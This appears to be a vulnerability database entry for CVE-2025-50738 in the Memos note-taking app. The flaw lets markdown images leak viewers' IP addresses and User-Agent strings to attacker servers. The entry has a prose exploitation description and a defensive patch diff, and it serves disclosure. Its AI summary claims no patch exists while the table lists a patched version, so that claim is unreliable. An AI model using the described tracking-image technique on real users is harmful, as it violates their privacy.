CVE-2025-50738
Description
The Memos application, up to version v0.24.3, allows for the embedding of markdown images with arbitrary URLs. When a user views a memo containing such an image, their browser automatically fetches the image URL without explicit user consent or interaction beyond viewing the memo. This can be exploited by an attacker to disclose the viewing user's IP address, browser User-Agent string, and potentially other request-specific information to the attacker-controlled server, leading to information disclosure and user tracking.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Memos up to v0.24.3 automatically fetches arbitrary image URLs in markdown memos, exposing viewers' IP addresses and User-Agent strings to attacker-controlled servers.
Vulnerability
Overview
CVE-2025-50738 affects the Memos application, an open-source note-taking tool, in versions up to v0.24.3. The issue lies in the markdown parser component (gomark) and the frontend image rendering code. When a user views a memo containing a markdown image with an arbitrary URL, the browser automatically sends a GET request to that URL without requiring any further user interaction [1][4]. This behavior allows an attacker to embed a link to a server they control.
Exploitation
An attacker can craft a memo containing a markdown image tag pointing to an attacker-owned server. Any user who views this memo will trigger a request from their browser to that server. No additional clicks or permissions are needed. The attack is straightforward to execute and can be performed by any authenticated user of the Memos instance [1][4].
Impact
The attacker can collect the viewer's IP address and browser User-Agent string, and potentially other request-specific metadata. This information can be used for user tracking, geolocation, or fingerprinting. While this does not directly compromise the Memos application itself, it violates user privacy and can lead to information disclosure [1][4].
Mitigation
As of the publication date, no official patch has been released for this vulnerability. Users are advised to upgrade to a future patched version when available, or to consider restricting image loading in memo viewing (e.g., via Content Security Policy). The Memos project is actively maintained on GitHub [2], so a fix may be forthcoming.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
github.com/usememos/memosGo | < 0.24.4 | 0.24.4 |
Affected products
2- Memos application/Memos applicationdescription
Patches
146d5307d7f21fix: prevent XSS for specific content types
1 file changed · +6 −0
server/router/api/v1/resource_service.go+6 −0 modified@@ -188,6 +188,12 @@ func (s *APIV1Service) GetResourceBinary(ctx context.Context, request *v1pb.GetR if strings.HasPrefix(contentType, "text/") { contentType += "; charset=utf-8" } + // Prevent XSS attacks by serving potentially unsafe files with a content type that prevents script execution. + if strings.EqualFold(contentType, "image/svg+xml") || + strings.EqualFold(contentType, "text/html") || + strings.EqualFold(contentType, "application/xhtml+xml") { + contentType = "application/octet-stream" + } return &httpbody.HttpBody{ ContentType: contentType,
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-hfcf-79gh-f3jcghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2025-50738ghsaADVISORY
- github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50738ghsaWEB
- github.com/usememos/memos/commit/46d5307d7f210067b46e07400a728fa9095803d9ghsaWEB
- github.com/usememos/memos/issues/4707ghsaWEB
News mentions
0No linked articles in our index yet.